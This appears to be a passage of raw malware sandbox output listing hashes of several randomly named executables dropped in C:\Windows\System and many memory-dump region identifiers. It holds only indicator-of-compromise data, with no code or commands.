SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\MKyDVGE.exe

MD5 86cf2e3a0073ecf1a681549d4f83f94f
SHA1 98a63ee352df7d7e3cc93db42ae9efe0dbad1e13
SHA256 0e27546a3c72f72905cf48947b169ff494351ac7c2a90f4b51e712cb05ad52e0
SHA512 6125cf413365eabf8c6ef53a0771dd4b0f845b1cee8f37e863fe735df7ff511d733811517e918a97c9b322bcb9324f891ada13a2bf5c9a805f0f88eefd6930d1

C:\Windows\System\dpXuEkL.exe

MD5 0355fe71844b846395634af340872268
SHA1 b30faba695cb36ca359b45b26e79e9f4f609ca66
SHA256 43ded90ca2cd6631c2c35caebdd65c8f2deb84cd545929e021b0ccfcffc36b05
SHA512 5b319bad4439d002a2a274f0d8dba8c7d2193025445db2084648f2006a09c474fb2e6d56c64a095505435872d0624593dad221ae7a603e20b4a906780cf8db42

C:\Windows\System\SHtzeCg.exe

MD5 231fb770fc7236a3f60ab582bd5d24a8
SHA1 be0d2ed1b6748ab10a3656e7b90d09fb8da41360
SHA256 3a2e60dbeb19d1ba95200b0bbd9a7755b0d620fa6d381a3c5ca68cfedaed0971
SHA512 128e32f8ed4c5e4b3a8b00296a9666230a079267228cf8f7eb091e75d27e5d66ba9591c7c63846f62ce503b852674c82bb7aa666391d181a5cad469f76021961

C:\Windows\System\cmSvGdc.exe

MD5 fec1ae92c4d778628a1344162445e06c
SHA1 54dab7a4b50bc98534fe4c7fd96c147f4b637c2b
SHA256 5cb5539dc3ebe4f1973fc692088aa8bfa1c04f073e1d50508ba7dd7b89d2d446
SHA512 7a01a9ac6a6e9b3a757d191d91eee09d10d9de43952d7ee603a9079252856633a0db1dfd60176051af1d5fd3dfecb1a66d916fb453002720bded2e3b6cffb196

C:\Windows\System\pCqwNwX.exe

MD5 8c3a9c44328159c97865321d95dd2f99
SHA1 557054f83c43bf68777f3fad088897fd0d4326b9
SHA256 04f37bf52e42dcb22e827375f77c91da4bbb4a580a9adbccfc78326b364bfe00
SHA512 631d02be65d757aad101df3c31e275cd348b5f5a09f36d108626c0667dfd42f19e3cf3bd70b99c681e38213b13558dd4bc43b926d5582bcbb934ffeef4cf84fc

memory/4280-44-0x00007FF60AAC0000-0x00007FF60AEB6000-memory.dmp

memory/2512-39-0x00007FF6DBF60000-0x00007FF6DC356000-memory.dmp

memory/3540-15-0x00007FF641F70000-0x00007FF642366000-memory.dmp

memory/216-1665-0x00007FF7ABA80000-0x00007FF7ABE76000-memory.dmp

C:\Windows\System\vXvqqCK.exe

MD5 fbef424b1922acb531e69f596a8b8921
SHA1 584ada3a02d95facb3db59252be930cc2019a07e
SHA256 9ba99dfe86f586665444906d4d6c065235a1faa079a57e34597feec2870450c4
SHA512 b7c856eeb52f1f5b978a86cc276964a598136109586a3999d60402c0885755b7f0a6e5ca90b5856e8f2e8d74fc885b0d7e257ea62c297369572d765724b94880

memory/4488-2338-0x00007FF76E420000-0x00007FF76E816000-memory.dmp

memory/2512-2339-0x00007FF6DBF60000-0x00007FF6DC356000-memory.dmp

memory/4280-2340-0x00007FF60AAC0000-0x00007FF60AEB6000-memory.dmp

memory/3540-2341-0x00007FF641F70000-0x00007FF642366000-memory.dmp

memory/5116-2342-0x00007FF658460000-0x00007FF658856000-memory.dmp

memory/1476-2344-0x00007FF622B10000-0x00007FF622F06000-memory.dmp

memory/2328-2343-0x00007FF6A8FC0000-0x00007FF6A93B6000-memory.dmp

memory/4280-2345-0x00007FF60AAC0000-0x00007FF60AEB6000-memory.dmp

memory/4488-2350-0x00007FF76E420000-0x00007FF76E816000-memory.dmp

memory/676-2351-0x00007FF6D5430000-0x00007FF6D5826000-memory.dmp

memory/1804-2352-0x00007FF7B86F0000-0x00007FF7B8AE6000-memory.dmp

memory/3452-2349-0x00007FF686EB0000-0x00007FF6872A6000-memory.dmp

memory/2512-2348-0x00007FF6DBF60000-0x00007FF6DC356000-memory.dmp

memory/3992-2347-0x00007FF726C80000-0x00007FF727076000-memory.dmp

memory/1928-2346-0x00007FF7DCAF0000-0x00007FF7DCEE6000-memory.dmp

memory/4628-2353-0x00007FF7AD6F0000-0x00007FF7ADAE6000-memory.dmp

memory/2980-2364-0x00007FF762150000-0x00007FF762546000-memory.dmp

memory/3188-2362-0x00007FF609610000-0x00007FF609A06000-memory.dmp

memory/2516-2361-0x00007FF7CD020000-0x00007FF7CD416000-memory.dmp

memory/1068-2360-0x00007FF6FB610000-0x00007FF6FBA06000-memory.dmp

memory/2360-2359-0x00007FF6A9A30000-0x00007FF6A9E26000-memory.dmp

memory/4052-2358-0x00007FF7263D0000-0x00007FF7267C6000-memory.dmp

memory/3956-2357-0x00007FF67D9F0000-0x00007FF67DDE6000-memory.dmp

memory/3356-2356-0x00007FF6F46F0000-0x00007FF6F4AE6000-memory.dmp

memory/3320-2355-0x00007FF7AF310000-0x00007FF7AF706000-memory.dmp

memory/4772-2354-0x00007FF620C80000-0x00007FF621076000-memory.dmp

memory/2004-2363-0x00007FF69CB50000-0x00007FF69CF46000-memory.dmp